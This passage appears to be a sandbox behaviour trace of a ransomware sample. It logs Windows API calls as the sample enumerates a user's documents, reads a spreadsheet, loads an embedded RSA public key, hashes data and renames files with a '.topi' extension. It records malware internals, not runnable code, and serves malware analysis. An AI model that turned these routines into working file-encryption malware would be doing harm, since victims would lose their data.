Size=0x82) returned 0x99f7410 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.028] GetCurrentThreadId () returned 0x8c4 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.028] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9798 [0096.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97b0 [0096.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9780 [0096.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.029] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d97c8 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9798 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9798 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9798 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97c8 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d97b0 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9780 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9768 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f24f0 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.031] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xf1c7, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xf1c7, lpOverlapped=0x0) returned 1 [0096.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.032] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xf1cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.032] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0096.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0096.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.032] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0096.032] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.032] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.032] CloseHandle (hObject=0x6a8) returned 1 [0096.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0096.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0096.037] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0096.037] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\8KNJdo5s Y04PgsO.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\8knjdo5s y04pgso.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\8KNJdo5s Y04PgsO.csv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\8knjdo5s y04pgso.csv.topi")) returned 1 [0096.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.038] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.038] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.039] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f815f0, ftCreationTime.dwHighDateTime=0x1d5bf10, ftLastAccessTime.dwLowDateTime=0x41b8d320, ftLastAccessTime.dwHighDateTime=0x1d5c3e0, ftLastWriteTime.dwLowDateTime=0x41b8d320, ftLastWriteTime.dwHighDateTime=0x1d5c3e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D7sre-3HX8SgHUb", cAlternateFileName="D7SRE-~1")) returned 1 [0096.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0096.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0096.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3bc8 [0096.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3cb8 | out: hHeap=0x680000) returned 1 [0096.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0096.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4090 [0096.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0096.039] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb349b0, ftCreationTime.dwHighDateTime=0x1d5b7a4, ftLastAccessTime.dwLowDateTime=0x52b5f810, ftLastAccessTime.dwHighDateTime=0x1d5b9a4, ftLastWriteTime.dwLowDateTime=0x52b5f810, ftLastWriteTime.dwHighDateTime=0x1d5b9a4, nFileSizeHigh=0x0, nFileSizeLow=0x5408, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kjvzM0zTF.xls", cAlternateFileName="KJVZM0~1.XLS")) returned 1 [0096.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0096.039] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.039] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0096.039] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\kjvzM0zTF.xls") returned=".xls" [0096.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\kjvzM0zTF.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\kjvzm0ztf.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.039] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=21512) returned 1 [0096.040] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.042] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x53e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.042] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.043] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.043] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x5408, lpOverlapped=0x0) returned 1 [0096.043] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.043] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.043] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.043] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.044] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.044] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.044] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.044] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.044] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.045] GetLastError () returned 0x0 [0096.045] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.045] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.045] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.045] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.045] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5410) returned 0x99f92d8 [0096.045] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f24f0 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9768 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2538 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9780 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97b0 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d97c8 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.045] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.045] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.046] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) 